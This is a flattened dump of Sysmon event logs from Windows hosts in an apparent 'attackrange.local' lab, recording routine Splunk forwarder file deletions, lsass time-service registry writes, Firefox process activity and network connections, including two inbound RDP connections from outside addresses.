23542300x80000000000000001046645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:02.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D933DD0902C22A2944C2452D85A95C9F,SHA256=6C48C5AF5C90329234A3C8077EA6F27F8AAA2B9384DC4C7D743E7A17609E8E66,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:00.131{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.242.110.130amahgoob33.ptr1.ru64815-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:03.645{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5FF9FF3C44CE5C9CDD218879DAFE453,SHA256=AD357ADD71D26217AB45B79BD51CC93C28D5F12D7257C26013EAD8293169D3FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD7DD747D1B4238617651051CE7DA1DF,SHA256=69BBB0B0835CB13F1A52E3278A0987A64C68CE4C11C75D72AD7A5DCA1CB3A051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:04.660{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6521D5EB027F1B80EC620E80E9846C,SHA256=5157D72C9F8F4C14B36103FDB8AF87A114DE981475DC3AFE28683A5222BFAF32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:04.223{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99173AFD2F48E3260D9BDD391279B26E,SHA256=2A80DA00BBEF0F16B094000FA4D09F295995F5DA1E1022E86A0AA4A4A3E74B86,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000806419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000806418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f5c6106) 13241300x8000000000000000806417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x958557d5) 13241300x8000000000000000806416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xf749bfd5) 13241300x8000000000000000806415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x590e27d5) 13241300x8000000000000000806414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000806413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f5c6106) 13241300x8000000000000000806412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x958557d5) 13241300x8000000000000000806411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xf749bfd5) 13241300x8000000000000000806410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:04.520{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x590e27d5) 354300x8000000000000000806409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:03.200{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57183-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:05.692{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E329E7B9BFA125E316E2299768E6FC48,SHA256=C998DF935F37C3721F18E77BF83C09AF142678B89C1B178BFC006B548FC19B62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:56.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50935-false10.0.1.12-8000- 23542300x80000000000000001046648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:05.241{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9B06B467F90CE1D48360D9581C3589C,SHA256=3DA8E55A149A45F89EC4EB2E7C3ADC40AB7CF0FC5B57434251D98AE9DA5E7584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:06.723{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CCA275FB53E62A9A67A2F65E0EA5AD7,SHA256=B8CFD00946239AB3433CA7537F4D898C6F5F40B3595E54C1699A2CFA05D6F279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.272{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4821AD28D4218F6C109665A31B0B1DF6,SHA256=936902E2CCEB906ABE4457DAF6744DDFE060E644CB79F53749476EBD3AA4560F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.157{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.125{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001046652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:06.103{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001046651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:46:06.103{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.371.100454002C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001046650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:46:06.103{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.371.100454002C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:07.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D3AF0524EA92B94230144259EC3343F,SHA256=11F87E1F85CD23D2C2036DC60591A39E53E3031B21F439B30B401C66D8E0F46A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:07.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FD8261823C1779A961E4C14DE70F232,SHA256=747C53A6463110E4394BF6D26D8765A870CFDB135CC0D858BF35D65242BC56F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08230CA84345E31ABC886DF97DACF4A7,SHA256=DEF277E50971AB79584E2D950D8D6D60A9E4FDA33B0A5A1F914CB69DD061FB6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:08.288{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FC99CE4F6647E61D812C6C328AE4D3D,SHA256=C035CFDAC837C6AC4C5A108030E20258A14E003D3DB817746962E7BEB49149FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:07.376{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-53237-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.520{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D56480BC466A5AB86C9DC6C25702D12E,SHA256=7631F43EAFFA9992E0E2EA03B512F697E513A8880965330D84A7C524CCE4EED4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.520{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA8E4DA43336E193DFBCFCA86BA7D0CC,SHA256=B990C5A8E843BB0C5490B78C40B89508A164F467288C7B7F4ED543E229475183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:09.832{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B95488D8A00D6DE7B818EDD92146DE4,SHA256=84C83E2CC39F4005F979AF7A51E981D39C245607FBEFC8D6AA1F3A1C170DB1CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:01.057{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57184-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001046658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:09.289{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC69BF77DE725DFCEB88B4B34C366710,SHA256=FFD53255151BDB7309D518950ADE266D52C8B50EBC4D1DDDE347C65CC3C6BCCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:08.309{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57185-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000806428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:07.656{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57184-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:10.832{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=985A5FE341A16239FA2546ECFF39DCFF,SHA256=B411A95AC654D068036B0C6BA3C3BECF8DA775FD9ED94DC14675D471D03BFA9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:02.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50936-false10.0.1.12-8000- 23542300x80000000000000001046660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:10.304{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CF6A7C8F6BF9202DCA36D742A705350,SHA256=D0DBD7D93D2674582BE781E392CBB76511E1DF49B3D14FA57CD04306F45B103E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:11.864{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6293B328110553363086D6405B5F8819,SHA256=BEB7E1E31FA5CFB1E69B5B93D27A06B7C24364F1F5829394B1549CCCBE46878E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:11.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=877C05754C3E7122AAFCFBDE4999FF41,SHA256=BE1FF4F4ED132492E9B6541157478B55978D357AD8F152F7528AC2EF0AAA5BA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:12.895{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A750B83597AD35AD69A1AD6D9EB3EEA,SHA256=D51227233A66622846A85364365481CC3981357F99C807127F5410FC87A856CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:12.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33FEE15B7E2EC9E01201671D0D88CF8,SHA256=106299AC093A61FBA79F6E8D0B5CEB1A27E42A70163AA5C2C96FCBE463921D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:13.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0DE4857B5BC9604301A1E2DA5C45B8F,SHA256=DC71B8B18B52F82EC9A10D1CDAF4AD9B4C0F8FB160699006BFC08B29B9FCEA88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:13.370{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F27C38673A419C4284683668CBE05227,SHA256=5907EA52EB3E55EB5A0D550A080771EA2ACBD107064532EDDD158FC304634658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:14.938{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A63F55BEE6F9FAAA54DC84A9443A41,SHA256=64E5F53CF75FFAED246A8F0F74F2D96E2877819C296EFDF919D11E68B4016190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:14.385{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C900A4A76D875CC9450561AF0132894,SHA256=268579EA414D8BA1B033EAC0BF35A66551A4F3206FCB8D7219241A1CC939BAB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:15.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C1CC2230B504B5D35DF8642E2CE3D9,SHA256=AA3C33F49250609581B6E3E77A816E0201B6EABB8ABB4D6E15D331C10A6E19AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:15.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C773094C4B9204C047D92B8803ADAEE7,SHA256=EE22A9E6B5245E8F782225635084B0365AE8A89612F22A2BFEB22331B25FE017,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:14.337{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57186-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:15.369{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9157EF08F5618D8BE42A815D647BD25C,SHA256=FDD4506C3350659944955BAAAFB5AC985C888AA1923F55C94884D951C99ED656,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:15.369{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 